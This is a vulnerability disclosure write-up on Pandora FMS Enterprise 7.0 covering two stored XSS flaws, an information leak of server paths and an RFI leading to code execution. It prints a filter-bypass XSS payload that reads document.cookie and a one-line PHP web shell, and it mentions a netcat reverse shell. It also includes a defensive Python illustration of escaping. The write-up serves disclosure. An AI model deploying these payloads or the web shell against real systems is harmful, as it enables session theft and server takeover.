Security Issue on Pandora FMS Enterprise

Version 7.0

Researching the platform, my coworker Edward Amaral, a security researcher at Stone Payments, and I found some security issues in the network manager from Pandora.

Let's get all the security issues explained:

- Agent form, Stored XSS

- Map editing, Stored XSS

- Information Leak

- RFI With RCE

First, let's talk a bit about the application itself. We first got a license so we could test the application, and we were very well supported by their team, which helped a lot in writing the reports and testing the application.

The first issue was a Stored XSS, which was kind of difficult to pull off. We tried different payloads, and they were all being remediated by the server. But we found that the application had some issues remediating some types of payloads.

The payload used to pull off that beautiful pop-up with those session IDs was: <script ~~~>alert(document.cookie)</script ~~~>

That's a relatively simple XSS script, which uses an exotic bypass technique: the "~" characters deceive the server into thinking it's not an HTML tag.
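As an added illustration (not code from the original write-up or from Pandora FMS), the Python below shows why a deny-list filter of the kind this bypass defeats misses the page's payload, while HTML output encoding neutralises it regardless of how the tag is spelled. The deny-list regex is an assumed stand-in for a weak filter, not Pandora's actual code.

```python
import html
import re

# Constructed samples: the plain payload and the "~" variant from the write-up.
PAYLOADS = [
    "<script>alert(document.cookie)</script>",
    "<script ~~~>alert(document.cookie)</script ~~~>",
]

# Assumed weak filter: only recognises a tag when the name is directly
# followed by '>'. Anything between the name and '>' slips past it.
TAG_DENYLIST = re.compile(r"</?(script|img|iframe)>", re.IGNORECASE)


def naive_strip(value: str) -> str:
    """Deny-list sanitiser: removes exact '<script>' / '</script>' only."""
    return TAG_DENYLIST.sub("", value)


# Browsers treat everything after the tag name up to '>' as (possibly
# malformed) attributes, so '<script ~~~>' still opens a script element.
# This lenient matcher mirrors that parsing behaviour.
TAG_ANY = re.compile(r"<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)[^>]*>")


def is_still_scripting(value: str) -> bool:
    """True if the string still contains what a browser parses as a script tag."""
    return any(m.group(1).lower() == "script" for m in TAG_ANY.finditer(value))


def escape_for_html(value: str) -> str:
    """The correct fix: encode on output so no '<' survives to become a tag."""
    return html.escape(value, quote=True)


def evaluate(payload: str) -> dict:
    """Compare both defences against one payload."""
    return {
        "naive_blocks": not is_still_scripting(naive_strip(payload)),
        "escape_blocks": not is_still_scripting(escape_for_html(payload)),
    }


if __name__ == "__main__":
    for p in PAYLOADS:
        print(p, evaluate(p))
```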

Cross-Site Scripting is the third most critical web application vulnerability according to OWASP (the Open Web Application Security Project), an online community that produces a ton of free, quality infosec content.

The second flaw was another XSS, but this time while creating a map. While creating a map, with a little testing we found a parameter that was vulnerable to the same payload used in the first issue.

So, again, the payload used was <script ~~~>alert(document.cookie)</script ~~~>

For that one to pop up in a real attack scenario, the victim needs to click twice on the XSS-poisoned map.

The third issue is an information leak that reveals that the OS running the server is UNIX-based, and where the web server's files are located on the machine.

This info is acquired on the main page of the application: when a graph is loading, it sends a request containing the information, which can be intercepted using Burp Suite.

This information is passed via GET parameters, as we can see in the URL below.

URL:

http://<IP>/pandora_console/include/graphs/fgraph.php?homeurl=../../&graph_type=progressbar&width=120&homedir=/var/www/html/pandora_console&height=10&progress=100&mode=0&out_of_lim_str=Fora%20dos%20limites&title=&font=/var/www/html/pandora_console/include/fonts/smallfont.ttf&value_text=100%&colorRGB=

The fourth issue is an RFI.

Remote File Inclusion is the process of including remote files by exploiting vulnerable inclusion procedures implemented in the application. This can lead to something as simple as outputting the contents of the file, but depending on the severity, it can also lead to:

· Code execution on the web server

· Code execution on the client side, such as JavaScript, which can lead to other attacks such as cross-site scripting (XSS)

· Denial of Service (DoS)

· Sensitive Information Leakage

In our case, we uploaded a file to the server through the file manager function. This function is only available to administrator users. We sent a simple PHP file that uses a function to execute system commands. We used the code quoted in the example below:

<?php system($_GET['cmd']); ?>

After that, we initiated a remote connection to a specific IP, with a reverse shell interaction using netcat, which resulted in a reverse shell on the server. That reverse shell code was created with MSFVenom.